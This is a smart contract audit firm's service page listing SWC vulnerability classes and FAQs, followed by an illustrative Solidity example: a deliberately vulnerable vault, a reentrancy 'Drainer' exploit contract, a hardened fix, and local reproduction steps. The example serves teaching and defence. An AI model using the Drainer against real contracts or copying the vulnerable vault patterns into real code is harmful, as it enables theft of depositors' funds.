
Ethereum Services


Smart Contract Audit for Ethereum


Our audit process for Ethereum smart contracts follows a comprehensive approach: we investigate the code for security flaws and potential vulnerabilities and recommend the best available ways to mitigate them.

Importance of a Security Audit

Smart contracts hold assets worth millions; every issue and security flaw must be fixed before deploying to mainnet.

Secure code raises the chances of project success.

Your code should faithfully implement your use case.

If your smart contract is verified by a third-party auditor, it gains value in the market and attracts investors.

Our Ethereum Audit Services


Blockchain / Platform Audit

This is usually a combined engagement (smart contracts plus the backend and wallets). We identify and research the best optimisations possible for the smart contract, which can save precious Ethereum gas, and we focus on making the platform more efficient and secure overall.


Smart Contracts Audit

A smart contract audit tests the source code against all known vulnerabilities and attacks. It identifies security vulnerabilities before deployment so that they cannot cause a loss of funds. Both the business-case logic and the security perspective are considered.

How We Process


Our Ethereum Audit Items

ID       Title                                                    Relationship
SWC-136  Unencrypted Private Data On-Chain                        CWE-767: Access to Critical Private Variable via Public Method
SWC-135  Code With No Effects                                     CWE-1164: Irrelevant Code
SWC-134  Message call with hardcoded gas amount                   CWE-655: Improper Initialization
SWC-133  Hash Collisions With Multiple Variable Length Arguments  CWE-294: Authentication Bypass by Capture-replay
SWC-132  Unexpected Ether balance                                 CWE-667: Improper Locking
SWC-131  Presence of unused variables                             CWE-1164: Irrelevant Code
SWC-130  Right-To-Left-Override control character (U+202E)        CWE-451: User Interface (UI) Misrepresentation of Critical Information
SWC-129  Typographical Error                                      CWE-480: Use of Incorrect Operator
SWC-128  DoS With Block Gas Limit                                 CWE-400: Uncontrolled Resource Consumption
SWC-127  Arbitrary Jump with Function Type Variable               CWE-695: Use of Low-Level Functionality
SWC-126  Insufficient Gas Griefing                                CWE-691: Insufficient Control Flow Management
SWC-125  Incorrect Inheritance Order                              CWE-696: Incorrect Behavior Order
SWC-124  Write to Arbitrary Storage Location                      CWE-123: Write-what-where Condition
SWC-123  Requirement Violation                                    CWE-573: Improper Following of Specification by Caller
SWC-122  Lack of Proper Signature Verification                    CWE-345: Insufficient Verification of Data Authenticity
SWC-121  Missing Protection against Signature Replay Attacks      CWE-347: Improper Verification of Cryptographic Signature
SWC-120  Weak Sources of Randomness from Chain Attributes         CWE-330: Use of Insufficiently Random Values
SWC-119  Shadowing State Variables                                CWE-710: Improper Adherence to Coding Standards
SWC-118  Incorrect Constructor Name                               CWE-665: Improper Initialization
SWC-117  Signature Malleability                                   CWE-347: Improper Verification of Cryptographic Signature
SWC-116  Block values as a proxy for time                         CWE-829: Inclusion of Functionality from Untrusted Control Sphere
SWC-115  Authorization through tx.origin                          CWE-477: Use of Obsolete Function
SWC-114  Transaction Order Dependence                             CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
SWC-113  DoS with Failed Call                                     CWE-703: Improper Check or Handling of Exceptional Conditions
SWC-112  Delegatecall to Untrusted Callee                         CWE-829: Inclusion of Functionality from Untrusted Control Sphere
SWC-111  Use of Deprecated Solidity Functions                     CWE-477: Use of Obsolete Function
SWC-110  Assert Violation                                         CWE-670: Always-Incorrect Control Flow Implementation
SWC-109  Uninitialized Storage Pointer                            CWE-824: Access of Uninitialized Pointer
SWC-108  State Variable Default Visibility                        CWE-710: Improper Adherence to Coding Standards
SWC-107  Reentrancy                                               CWE-841: Improper Enforcement of Behavioral Workflow
SWC-106  Unprotected SELFDESTRUCT Instruction                     CWE-284: Improper Access Control
SWC-105  Unprotected Ether Withdrawal                             CWE-284: Improper Access Control
SWC-104  Unchecked Call Return Value                              CWE-252: Unchecked Return Value
SWC-103  Floating Pragma                                          CWE-664: Improper Control of a Resource Through its Lifetime
SWC-102  Outdated Compiler Version                                CWE-937: Using Components with Known Vulnerabilities
SWC-101  Integer Overflow and Underflow                           CWE-682: Incorrect Calculation
SWC-100  Function Default Visibility                              CWE-710: Improper Adherence to Coding Standards

Frequently Asked Questions

What is an Ethereum smart contract audit?
It is the process of scrutinizing the code of a smart contract written for the Ethereum blockchain: a thorough analysis of the source code against known vulnerabilities and loopholes to find errors before the contract reaches mainnet.

How do you audit Ethereum smart contracts?
Our Ethereum smart contract audit process begins with gathering the code specification, where we learn the intended behaviour of the smart contract. After this comes unit testing, followed by static analysis and formal verification to identify coding flaws. Then manual analysis is performed and an initial report is delivered listing all the vulnerabilities and issues to be fixed.

What are the key benefits of passing an Ethereum contract audit?
The major benefit of an Ethereum smart contract audit is that the chances of your project being hacked are greatly reduced. Since the root cause of most smart contract exploits is a vulnerability in the code, an audit mitigates those vulnerabilities and loopholes by testing the code under adversarial conditions. Audits also help projects build trust and authority with users, partners, and investors.

How much does it cost to audit an Ethereum smart contract?
On average, the cost lies between $1,500 and $15k, but it depends on the number of lines of code and the complexity of the Ethereum smart contract. This is a broad range; the cost varies with the size of the project.

What issues can be identified during an Ethereum contract audit?
We scrutinize the Ethereum contract code against the vulnerabilities behind recent exploits and thoroughly examine it against the vulnerabilities in the SWC registry. Some common loopholes we check for are Reentrancy, Integer Overflow and Underflow, Unprotected Ether Withdrawal, and Floating Pragma, among others.
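The loopholes named in the last answer (Reentrancy, SWC-107; Unprotected Ether Withdrawal, SWC-105; Floating Pragma, SWC-103; and Integer Overflow and Underflow, SWC-101) are the ones most often found together in a simple Ether vault, so the following added example shows them in one place. It is not QuillAudits' code or a client contract: `VulnerableVault`, the `Drainer` contract that exploits it and `HardenedVault` are hypothetical contracts written for this page, and the one-ether deposit amount is an arbitrary choice for the example.

```solidity
// SPDX-License-Identifier: MIT
// SWC-103: a floating pragma such as `pragma solidity ^0.8.0;` would let the contract be
// compiled with a compiler release other than the one that was audited; pin it instead.
pragma solidity 0.8.20;

// Deliberately vulnerable vault (hypothetical, added for illustration).
contract VulnerableVault {
    mapping(address => uint256) public balances;
    address public owner;

    constructor() { owner = msg.sender; }

    function deposit() external payable { balances[msg.sender] += msg.value; }

    // SWC-107: the external call runs before the balance is zeroed, so a contract
    // receiver's receive() can call withdraw() again while its balance is still credited.
    function withdraw() external {
        uint256 amount = balances[msg.sender];
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0;
    }

    // SWC-115 (and in effect SWC-105): tx.origin stays equal to the owner when the owner
    // calls any phishing contract, which can then call sweep() and drain the vault.
    function sweep(address payable to) external {
        require(tx.origin == owner, "not owner");
        to.transfer(address(this).balance);
    }
}

// Hypothetical attacker: receive() re-enters withdraw() until the vault is nearly empty.
contract Drainer {
    VulnerableVault private immutable vault;

    constructor(VulnerableVault _vault) { vault = _vault; }

    function attack() external payable {
        require(msg.value == 1 ether, "send exactly 1 ether");
        vault.deposit{value: 1 ether}();
        vault.withdraw();               // first withdrawal; each payout re-enters below
    }

    receive() external payable {
        if (address(vault).balance >= 1 ether) vault.withdraw();
    }
}

// Hardened vault (hypothetical, added for illustration).
contract HardenedVault {
    mapping(address => uint256) public balances;
    address public immutable owner;
    uint256 private locked = 1;         // 1 = free, 2 = entered

    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    constructor() { owner = msg.sender; }

    // SWC-101: Solidity 0.8 reverts on overflow here; keep such arithmetic out of
    // `unchecked` blocks unless the bound has been proven.
    function deposit() external payable { balances[msg.sender] += msg.value; }

    // Checks-effects-interactions: state is updated before the external call, and the
    // guard blocks a second entry even if a later edit reorders these lines.
    function withdraw() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");  // SWC-104: low-level call result is checked
    }

    // SWC-115 / SWC-105: authorise on msg.sender, never on tx.origin.
    function sweep(address payable to) external nonReentrant {
        require(msg.sender == owner, "not owner");
        (bool ok, ) = to.call{value: address(this).balance}("");
        require(ok, "transfer failed");
    }
}
```

To reproduce the exploit in a local test network, deploy `VulnerableVault`, fund it from a few accounts, then deploy `Drainer` against it and call `attack` with one ether: the vault balance falls to below one ether while `Drainer` ends up holding what the other depositors put in. Running the same `Drainer` against `HardenedVault` reverts on the second entry because the balance is already zero and the guard is set.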

      Trusted by 600+ web3 Products

      Secure Your Projects on Ethereum Blockchain with QuillAudits Smart Contract Auditing Services
